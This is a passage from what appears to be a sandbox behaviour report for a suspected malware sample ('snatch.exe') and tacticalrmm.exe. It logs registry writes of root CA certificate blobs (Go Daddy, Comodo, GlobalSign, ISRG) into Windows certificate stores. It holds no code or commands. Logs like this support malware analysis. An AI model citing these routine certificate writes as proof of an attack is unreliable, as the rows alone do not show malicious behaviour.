c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	tacticalrmm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 04000000010000001000000091de0625abdafd32170cbb25172a84670300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee404000000010000001000000091de0625abdafd32170cbb25172a846720000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	tacticalrmm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	2024-05-02_089359e83c311755633b97cb26fef287_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	2024-05-02_089359e83c311755633b97cb26fef287_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	2024-05-02_089359e83c311755633b97cb26fef287_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c